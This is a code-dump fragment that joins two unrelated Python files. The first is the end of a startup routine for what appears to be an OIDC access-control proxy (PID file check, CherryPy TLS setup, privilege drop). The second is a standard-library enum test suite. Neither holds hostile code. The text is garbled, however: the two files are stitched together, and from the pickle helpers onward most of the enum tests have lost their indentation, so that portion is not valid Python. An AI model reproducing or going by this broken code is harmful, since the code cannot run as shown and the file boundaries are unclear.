            "client_secret": args.client_secret,
            "redirect_uris": redirect_uris
        }
        secrets[args.add_provider] = secret_dict
        self.oidc_handler._secrets = secrets
        self.oidc_handler.create_client_from_secrets(args.add_provider, provider_cfg)
        self.save_secrets()
        return
    #### Read AC Rules
    for acl_dir in self.config.access_control['json_dir']:
        ServiceProxy.ac.load_dir(acl_dir)
    if args.check_ac:
        ServiceProxy.ac.check()
        return

    if args.daemonize:
        daemonizer = Daemonizer(cherrypy.engine)
        daemonizer.subscribe()
    # check if pid file exists
    try:
        with open(self.config.misc.pid_file) as pidfile:
            pid = int(pidfile.read().strip())
            try:
                os.kill(pid, 0)  # check if running
            except OSError:
                # not running: stale pid file, take it over
                PIDFile(cherrypy.engine,
                        self.config.misc.pid_file).subscribe()
            else:
                # running
                print("PID File %s exists" % self.config.misc.pid_file)
                print(
                    "Another instance of arpoc seems to be running"
                )
                return
    except FileNotFoundError:
        PIDFile(cherrypy.engine, self.config.misc.pid_file).subscribe()

    #### Setup OIDC Provider
    cherrypy.engine.subscribe('start', self.setup_oidc_provider, 80)
    cherrypy.engine.subscribe('stop', self.cancel_scheduler, 80)
    cherrypy.engine.subscribe('stop', self.save_secrets, 80)
    #### Setup Cherrypy
    global_conf = {
        'log.screen': False,
        'log.access_file': '',
        'log.error_file': '',
        'server.socket_host': config.cfg.proxy['address'],
        'server.socket_port': config.cfg.proxy['tls_port'],
        'server.ssl_private_key': config.cfg.proxy['keyfile'],
        'server.ssl_certificate': config.cfg.proxy['certfile'],
        'engine.autoreload.on': False
    }
    cherrypy.config.update(global_conf)
    app_conf = {
        '/': {
            'tools.sessions.on': True,
            'request.dispatch': self.get_routes_dispatcher()
        }
    }
    DropPrivileges(cherrypy.engine, uid=self.uid, gid=self.gid).subscribe()
    #### Start Web Server
    cherrypy.tree.mount(None, '/', app_conf)
    if self.config.proxy['plain_port']:
        # Optional second listener for plain HTTP (e.g. TLS redirects).
        server2 = cherrypy._cpserver.Server()
        server2.socket_port = self.config.proxy['plain_port']
        server2._socket_host = self.config.proxy['address']
        server2.thread_pool = 30
        server2.subscribe()
    cherrypy.engine.start()
    cherrypy.engine.block()
    # cherrypy.quickstart(None, '/', app_conf)
|
test_enum.py | import enum
import inspect
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from datetime import timedelta
# for pickle tests
# Each fixture below is defined inside try/except so that a failure to
# create the enum binds the fixture name to the exception instead of
# breaking module import; the test that uses the fixture then reports it.
try:
    class Stooges(Enum):
        LARRY = 1
        CURLY = 2
        MOE = 3
except Exception as exc:
    Stooges = exc

try:
    class IntStooges(int, Enum):
        LARRY = 1
        CURLY = 2
        MOE = 3
except Exception as exc:
    IntStooges = exc

try:
    class FloatStooges(float, Enum):
        LARRY = 1.39
        CURLY = 2.72
        MOE = 3.142596
except Exception as exc:
    FloatStooges = exc

try:
    class FlagStooges(Flag):
        LARRY = 1
        CURLY = 2
        MOE = 3
except Exception as exc:
    FlagStooges = exc

# for pickle test and subclass tests
try:
    class StrEnum(str, Enum):
        'accepts only string values'
    class Name(StrEnum):
        BDFL = 'Guido van Rossum'
        FLUFL = 'Barry Warsaw'
except Exception as exc:
    Name = exc

# Functional-API fixtures exercising module=, default module lookup, and
# qualname= respectively.
try:
    Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
    Question = exc

try:
    Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
    Answer = exc

try:
    Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
    Theory = exc

# for doctests
try:
    class Fruit(Enum):
        TOMATO = 1
        BANANA = 2
        CHERRY = 3
except Exception:
    pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
    # Exercises enum's internal name/descriptor helpers:
    # _is_descriptor, _is_sunder, _is_dunder.

    def test_is_descriptor(self):
        class Plain:
            pass
        for magic in ('__get__', '__set__', '__delete__'):
            candidate = Plain()
            self.assertFalse(enum._is_descriptor(candidate))
            setattr(candidate, magic, 1)
            self.assertTrue(enum._is_descriptor(candidate))

    def test_is_sunder(self):
        sunder_names = ('_a_', '_aa_')
        non_sunder_names = ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__',
                            '__a_', '_', '__', '___', '____', '_____')
        for candidate in sunder_names:
            self.assertTrue(enum._is_sunder(candidate))
        for candidate in non_sunder_names:
            self.assertFalse(enum._is_sunder(candidate))

    def test_is_dunder(self):
        dunder_names = ('__a__', '__aa__')
        non_dunder_names = ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__',
                            '__a_', '_', '__', '___', '____', '_____')
        for candidate in dunder_names:
            self.assertTrue(enum._is_dunder(candidate))
        for candidate in non_dunder_names:
            self.assertFalse(enum._is_dunder(candidate))
# for subclassing tests
class classproperty:
    """Descriptor exposing a computed attribute on the class itself;
    access through an instance also delegates to the class."""

    def __init__(self, fget=None, fset=None, fdel=None, doc=None):
        self.fget = fget
        self.fset = fset
        self.fdel = fdel
        # Fall back to the getter's docstring when no doc is supplied.
        self.__doc__ = fget.__doc__ if doc is None and fget is not None else doc

    def __get__(self, instance, ownerclass):
        return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
    # Build a fresh family of enums for every test so per-test mutations
    # cannot leak between tests: a plain Enum, a float-mixin, an IntEnum,
    # a str-mixin, and a date-mixin.
    class Season(Enum):
        SPRING = 1
        SUMMER = 2
        AUTUMN = 3
        WINTER = 4
    self.Season = Season

    class Konstants(float, Enum):
        E = 2.7182818
        PI = 3.1415926
        TAU = 2 * PI
    self.Konstants = Konstants

    class Grades(IntEnum):
        A = 5
        B = 4
        C = 3
        D = 2
        F = 0
    self.Grades = Grades

    class Directional(str, Enum):
        EAST = 'east'
        WEST = 'west'
        NORTH = 'north'
        SOUTH = 'south'
    self.Directional = Directional

    from datetime import date
    class Holiday(date, Enum):
        # Values are (year, month, day) tuples passed to date().
        NEW_YEAR = 2013, 1, 1
        IDES_OF_MARCH = 2013, 3, 15
    self.Holiday = Holiday
def test_dir_on_class(self):
    # dir() on an Enum class lists its members plus a curated set of
    # dunders.
    Season = self.Season
    self.assertEqual(
        set(dir(Season)),
        set(['__class__', '__doc__', '__members__', '__module__',
             'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
    )

def test_dir_on_item(self):
    # dir() on a member exposes name/value but not sibling members.
    Season = self.Season
    self.assertEqual(
        set(dir(Season.WINTER)),
        set(['__class__', '__doc__', '__module__', 'name', 'value']),
    )

def test_dir_with_added_behavior(self):
    # Methods defined on the Enum appear on members, not as members.
    class Test(Enum):
        this = 'that'
        these = 'those'
        def wowser(self):
            return ("Wowser! I'm %s!" % self.name)
    self.assertEqual(
        set(dir(Test)),
        set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
    )
    self.assertEqual(
        set(dir(Test.this)),
        set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
    )

def test_dir_on_sub_with_behavior_on_super(self):
    # see issue22506
    class SuperEnum(Enum):
        def invisible(self):
            return "did you see me?"
    class SubEnum(SuperEnum):
        sample = 5
    self.assertEqual(
        set(dir(SubEnum.sample)),
        set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
    )

def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
    # see issue40084
    class SuperEnum(IntEnum):
        def __new__(cls, value, description=""):
            obj = int.__new__(cls, value)
            obj._value_ = value
            obj.description = description
            return obj
    class SubEnum(SuperEnum):
        sample = 5
    # Attributes set in __new__ (instance dict) must show up in dir().
    self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
    def test_intenum_value(self):
        """IntEnum members expose their int value via .value (module-level fixture)."""
        self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
    def test_contains(self):
        """Membership tests accept members only; raw values raise TypeError."""
        # NOTE(review): raising TypeError for non-member operands is
        # version-specific -- newer Python releases changed Enum.__contains__
        # to return False for raw values instead; confirm target version
        Season = self.Season
        self.assertIn(Season.AUTUMN, Season)
        with self.assertRaises(TypeError):
            3 in Season
        with self.assertRaises(TypeError):
            'AUTUMN' in Season
        # a member obtained by value lookup is contained
        val = Season(3)
        self.assertIn(val, Season)
        # a member of a *different* enum is not contained
        class OtherEnum(Enum):
            one = 1; two = 2
        self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'EnumWithFormatOverride.one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'TestFloat.one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited(self):
class StrEnum(str, Enum):
pass
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
